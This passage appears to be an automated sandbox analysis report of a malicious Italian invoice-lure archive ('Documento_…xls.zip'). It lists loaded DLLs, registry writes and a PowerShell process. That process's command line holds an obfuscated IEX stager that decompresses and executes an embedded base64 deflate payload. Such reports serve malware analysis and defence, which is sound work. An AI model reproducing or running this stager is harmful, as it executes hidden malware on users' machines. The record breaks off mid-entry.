c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\netutils.dll

PID
2340
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX "(' & ((gv ''*MDr*'').naMe[3,11,2]-Join'''') (neW-obJECt syStEM.Io.comPREssioN.deFlATEsTrEaM( [IO.MeMorYstrEAm][cONveRt]::frombAsE64STring( ''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'' ), [io.COmPressioN.CoMpReSSIOnmodE]::DeCoMpReSS )|foReach{ neW-obJECt iO.StreAMREaDeR($_, [SystEM.tEXT.ENCOdinG]::AsCII ) }).REAdtoEND( )')"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\shfolder.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.drawing\dbfe8642a8ed7b2b103ad28e0c96418a\system.drawing.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\c9b7480fe8ed9de8f2728e543bd52cb2\microsoft.powershell.graphicalhost.ni.dll
c:\windows\assembly\gac_msil\uiautomationtypes\3.0.0.0__31bf3856ad364e35\uiautomationtypes.dll
c:\windows\assembly\gac_msil\uiautomationprovider\3.0.0.0__31bf3856ad364e35\uiautomationprovider.dll
c:\windows\assembly\gac_msil\windowsbase\3.0.0.0__31bf3856ad364e35\windowsbase.dll
c:\windows\assembly\gac_32\presentationcore\3.0.0.0__31bf3856ad364e35\presentationcore.dll
c:\windows\assembly\gac_msil\presentationcffrasterizer\3.0.0.0__31bf3856ad364e35\presentationcffrasterizer.dll
c:\windows\assembly\gac_msil\presentationframework\3.0.0.0__31bf3856ad364e35\presentationframework.dll
c:\windows\assembly\gac_msil\presentationui\3.0.0.0__31bf3856ad364e35\presentationui.dll
c:\windows\assembly\gac_32\system.printing\3.0.0.0__31bf3856ad364e35\system.printing.dll
c:\windows\assembly\gac_msil\reachframework\3.0.0.0__31bf3856ad364e35\reachframework.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\windowsbase\cf293040f3a93afa1ea782487acae816\windowsbase.ni.dll
c:\windows\system32\netutils.dll

Registry activity

Total events
2060
Read events
1253
Write events
776
Delete events
31

Modification events

PID
Process
Operation
Key
Name
Value
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtBMP
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
ShellExtIcon
3044
WinRAR.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
0
C:\Users\admin\Desktop\Documento_030645_FT_20190415_0009002_.xls.zip
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
name
120
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
size
80
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
type
120
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
mtime
100
3044
WinRAR.exe
write
HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath
0
C:\Users\admin\Desktop
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem
2672
rundll32.exe
delete key
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
LocaleName
it-IT
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCalendarType
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s1159
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
s2359
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTimeFormat
HH:mm:ss
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTime
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTLZero
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iTimePrefix
0
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sTime
:
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortDate
dd/MM/yyyy
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDate
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDate
/
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLongDate
dddd d MMMM yyyy
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sYearMonth
MMMM yyyy
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCurrency
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrency
2
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegCurr
9
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCurrDigits
2
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sDecimal
,
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonDecimalSep
,
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sThousand
.
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonThousandSep
.
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sList
;
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iDigits
2
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iLZero
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iNegNumber
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNativeDigits
0123456789
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
NumShape
1
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iMeasure
0
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstDayOfWeek
0
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iFirstWeekOfYear
2
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sGrouping
3;0
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sMonGrouping
3;0
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sPositiveSign
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sNegativeSign
-
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iPaperSize
9
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sShortTime
HH:mm
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sLanguage
ITA
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
sCountry
Italy
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International
iCountry
39
2672
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
2672
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
2
00000409
2672
rundll32.exe
write
HKEY_CURRENT_USER\Keyboard Layout\Preload
1
00000410
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\TIP\{FA445657-9379-11D6-B41A-00065B83EE53}\LanguageProfile\0x00000409\{38445657-9381-11D6-B41A-00065B83EE53}
Enable
0
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Default
{00000000-0000-0000-0000-000000000000}
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
Profile
{00000000-0000-0000-0000-000000000000}
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\Assemblies\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}
KeyboardLayout
68158480
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\Language
00000000
00000410
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
CLSID
{00000000-0000-0000-0000-000000000000}
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
Profile
{00000000-0000-0000-0000-000000000000}
2672
rundll32.exe
write
HKEY_CURRENT_USER\Software\Microsoft\CTF\SortOrder\AssemblyItem\0x00000410\{34745C63-B2F0-4784-8B67-5E12C8701A31}\00000000
KeyboardLayout
68158480
2672
rundll32.exe
write
HKEY_CURRENT_USER\Control Panel\International\Geo
Nation
118
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
LanguageList
en-US
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5084
Arabic (101)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5053
Bulgarian (Typewriter)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5065
Chinese (Traditional) - US Keyboard
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5031
Czech
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5007
Danish
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5011
German
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5046
Greek
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5000
US
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5020
Spanish
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5009
Finnish
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5010
French
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5083
Hebrew
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5033
Hungarian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5013
Icelandic
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5015
Italian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5061
Japanese
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5063
Korean
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5008
Dutch
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5018
Norwegian
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5035
Polish (Programmers)
3296
rundll32.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E
@%SystemRoot%\system32\input.dll,-5003
Portuguese (Brazilian ABNT)
3296
rundll32.exe
write
